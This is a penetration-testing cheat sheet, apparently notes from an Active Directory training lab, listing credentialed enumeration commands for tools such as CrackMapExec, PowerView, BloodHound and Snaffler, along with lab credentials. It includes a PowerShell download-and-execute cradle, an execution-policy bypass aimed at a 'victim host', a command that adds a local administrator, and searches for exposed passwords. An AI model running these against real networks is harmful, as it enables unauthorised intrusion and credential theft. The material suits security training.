Credentialed Enumeration
Credentialed Enumeration - Linux
CrackMapExec
Domain User Enumeration
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --users
Domain Groups Enumeration
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --groups
Domain Logged On Users
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --loggedon-users
Domain Share Searching
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --shares
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
SMBMap
List Shares
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP>
Recursive List Shares
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP> -R '<share-name>' --dir-only
RPCclient
UserEnum by RID
HTB_@cademy_stdnt! <RID>
WindapSearch
Search Domain Admins
python3 windapsearch.py --dc-ip 172.16.5.5 -u [email protected] -p Klmcargo2 --da
Search Privileged Users
python3 windapsearch.py --dc-ip 172.16.5.5 -u [email protected] -p Klmcargo2 -PU
BloodHound-py
Enumerating Everything
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all
Credentialed Enumeration - Windows
Active Directory PowerShell Module
# Import Module
Import-Module ActiveDirectory
Domain Info
Get-ADDomain
Users Info
Get-ADUser
Trust Relations
Get-ADTrust -Filter *
Group Info
Get-ADGroup -Filter * | select name
Detailed Group Info
GetADGroup -Identity <group-name>
Group Memebership
Get-ADGroupMember -Identity <group-name>
PowerView
Domain Information
Get-Domain
Show Domain Controller
Get-DomainController
Show all Users
Get-DomainUser
Show All Computers
Get-DomainComputer
Show all Groups
Get-DomainGroup
Showe specific OU objects in AD
Get-DomainOU
Show Specific ACL's
Find-InterestingDomainAcl
Show members of a specific domain group
Get-DomainGroupMember
Show all GPO
Get-DomainGPO
Show User GPO Rights
# Change this to the user
$sid=Convert-NameToSid "Domain Users"
# Check Rights
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
Show Domain Policy
Get-DomainPolicy
Show Local Groups
Get-NetLocalGroup
Show members of a specific local group
Get-NetLocalGroupMember
Show Domain Shares
Find-InterestingDomainShareFile
Show machines on the local domain
Find-LocalAdminAccess
Show Domain Trust
Get-DomainTrust
Show all forest trusts for the current forest or a specified forest
Get-ForestTrust
Show Trusts in all
Get-DomainTrustMapping
Find Password In Users Description
Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}
Find Passwd_NOTREQ
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
DONT_REQ_PREAUTH
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
Snaffler
https://github.com/SnaffCon/Snaffler
Help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.
Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data
Credentialed Enumeration With Built-In Tools
Basic Enumeration Commands
# Prints the PC's Name
hostname
# Prints out the OS version and revision level
[System.Environment]::OSVersion.Version
# Prints the patches and hotfixes applied to the host
wmic qfe get Caption,Description,HotFixID,InstalledOn
PowerShell Enumeration Commands
# Lists available modules loaded for use.
Get-Module
# Will print the execution policy settings for each scope on a host.
Get-ExecutionPolicy -List
# This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
Set-ExecutionPolicy Bypass -Scope Process
# Return environment values such as key paths, users, computer information, etc.
Get-ChildItem Env: | ft Key,Value
# This is a quick and easy way to download a file from the web using PowerShell and call it from memory.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
# Status Firewall
netsh advfirewall show allprofiles
# Status Windows Defender
Get-MpComputerStatus
Net Commands
# Information about password requirements
net accounts
# Password and lockout policy
net accounts /domain
# Information about domain groups
net group /domain
# List users with domain admin privileges
net group "Domain Admins" /domain
# List of PCs connected to the domain
net group "domain computers" /domain
# List PC accounts of domains controllers
net group "Domain Controllers" /domain
# User that belongs to the group
net group <domain_group_name> /domain
# List of domain groups
net groups /domain
# Lst users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup administrators /domain
# Add user to administrators
net localgroup administrators [username] /add
# Check current shares
net share
# Get information about a user within the domain
net user <ACCOUNT_NAME> /domain
# List all users of the domain
net user /domain
# Get a list of computers
net view
Last updated